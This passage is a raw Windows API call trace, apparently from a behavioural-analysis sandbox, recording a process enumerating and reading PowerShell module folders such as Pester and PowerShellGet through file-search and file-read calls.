ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0178.152] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0178.152] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0178.152] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0178.153] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0178.154] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0178.154] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de0d0 | out: lpFindFileData=0x1b7de0d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.154] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de330) returned 1 [0178.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2f0) returned 1 [0178.159] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0178.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0178.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0178.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0178.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0178.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0178.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0178.160] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0178.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0178.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0178.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0178.161] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0178.161] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.161] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.161] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0178.161] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.161] FindClose (in: hFindFile=0x1a592790 | out: hFindFile=0x1a592790) returned 1 [0178.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0178.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0178.162] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7de170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0178.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de5b0) returned 1 [0178.162] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7de690 | out: lpFileInformation=0x1b7de690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0178.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de570) returned 1 [0178.163] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0178.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de350) returned 1 [0178.163] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0178.164] GetFileType (hFile=0x564) returned 0x1 [0178.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de2c0) returned 1 [0178.164] GetFileType (hFile=0x564) returned 0x1 [0178.164] ReadFile (in: hFile=0x564, lpBuffer=0x21b1990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b1990*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.166] ReadFile (in: hFile=0x564, lpBuffer=0x21b1990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b1990*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.166] ReadFile (in: hFile=0x564, lpBuffer=0x21b1990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b1990*, lpNumberOfBytesRead=0x1b7de428*=0x1000, lpOverlapped=0x0) returned 1 [0178.167] ReadFile (in: hFile=0x564, lpBuffer=0x21b1990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b1990*, lpNumberOfBytesRead=0x1b7de428*=0x5e5, lpOverlapped=0x0) returned 1 [0178.167] ReadFile (in: hFile=0x564, lpBuffer=0x21b0eb5, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b0eb5*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.167] ReadFile (in: hFile=0x564, lpBuffer=0x21b1990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7de428, lpOverlapped=0x0 | out: lpBuffer=0x21b1990*, lpNumberOfBytesRead=0x1b7de428*=0x0, lpOverlapped=0x0) returned 1 [0178.167] CloseHandle (hObject=0x564) returned 1 [0178.169] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0178.169] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0178.170] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0178.170] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0178.170] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0178.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.170] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0178.170] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0178.170] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.171] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.171] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0178.171] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0178.172] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0178.172] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0178.172] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0178.172] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a591fb0 [0178.172] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.172] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0178.173] FindNextFileW (in: hFindFile=0x1a591fb0, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0178.173] FindClose (in: hFindFile=0x1a591fb0 | out: hFindFile=0x1a591fb0) returned 1 [0178.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0178.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0178.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de380) returned 1 [0178.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0178.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0178.173] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7de020 | out: lpFindFileData=0x1b7de020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0178.175] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.175] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.175] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0178.175] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0178.176] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de070 | out: lpFindFileData=0x1b7de070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, 